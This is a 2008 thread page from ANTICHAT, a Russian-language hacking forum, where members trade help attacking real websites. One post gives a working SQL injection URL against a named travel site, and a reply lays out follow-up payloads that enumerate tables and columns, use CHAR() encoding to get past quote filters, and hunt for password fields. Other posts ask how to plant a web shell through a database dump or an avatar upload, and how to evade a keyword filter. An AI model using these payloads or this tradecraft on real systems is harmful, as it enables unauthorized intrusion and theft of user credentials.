HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2201  
Старый 31.05.2008, 21:19
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
Сообщение от Xszz  
Т.е. имея возможность залить обратно Дамп БД , я не могу залить шел ?
мое мнение - только если есть file_priv, у пользователя mysql.
ну или в самой базе содержится Php код, и потом выполняется в eval ... (очень редко такое бывает)
 
Ответить с цитированием

  #2202  
Старый 31.05.2008, 23:07
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,table_nam e,3,4,5,6,7,8,9+from+information_schema.tables+lim it+23,2/*
Колонка форума с юзерами. но что дальше делать это я забыл ;( подскажите
 
Ответить с цитированием

  #2203  
Старый 31.05.2008, 23:21
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Вообще то тебе дальше нужно узнать как называются столбики в найденой таблице, для этого нужно вывести поле column_name из таблицы information_schema.columns при этом указать where table_name='phpbb_acl_users' но если там кавычки фильруются то нужно закодировать допустим чаром вот так table_name=CHAR(112,104,112,98,98,95,97,99,108,95, 117,115,101,114,115)
Отсюда запрос будет таким
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_na me,3,4,5,6,7,8,9+from+information_schema.columns+w here+table_name=CHAR(112,104,112,98,98,95,97,99,10 8,95,117,115,101,114,115)/*
Потом лимитом перебираеш все столбики... НО... я глянул в это таблице вроде нету поле пароля...
Я обычно для ускорения делаю так
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_na me,3,4,5,6,7,8,table_name+from+information_schema. columns+where+column_name+LIKE+CHAR(37,112,97,115, 37)+limit+0,1/*
под чаром скрыто %pas% Это значит что я хочу вывести все столбики в которых есть сочетание 'pas' Можно конечно нарватся и на pwd тогда этот запрос не пройдет, но обычно значительно ускоряет процес.
Удачи!
 
Ответить с цитированием

  #2204  
Старый 31.05.2008, 23:45
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

А разве скл инж тул не работает в данном случае ?Особенно в пятой версии)
 
Ответить с цитированием

  #2205  
Старый 31.05.2008, 23:55
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Велемир
о да.. еще как работает sql tool 3

пс: у кого есть норм енкодер text в char()?

Последний раз редактировалось sabe; 01.06.2008 в 00:14..
 
Ответить с цитированием

  #2206  
Старый 31.05.2008, 23:56
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

http://www.webfuture.ru/igo/convert.php
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #2207  
Старый 01.06.2008, 00:03
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

спс)
 
Ответить с цитированием

  #2208  
Старый 01.06.2008, 15:04
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

ситуация такая:

Есть форум - вобла.
там можно юзать авики. Но там как и на ачате, не видно где лежит авик. а такой адрес, типа _http://forum.antichat.ru/image.php?u=34303&dateline=1206845324

мне нужно в авик вписать шелл.

вопрос:
как мне анйти путь к моему авику? Или в этом случае аваторы в БД?
 
Ответить с цитированием

  #2209  
Старый 01.06.2008, 15:18
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

В булке аватары в бд если не ошибаюсь)
__________________
 
Ответить с цитированием

  #2210  
Старый 01.06.2008, 15:54
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Есть скуля. Версия 5. База данных и юзера выдернул.
Когда начинают вытаскивать наименования колонки, меня выкидывает на белую страницу ни без чего.
Есть предположение, что фильтрует "table_name" - как этот фильтр обойти?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ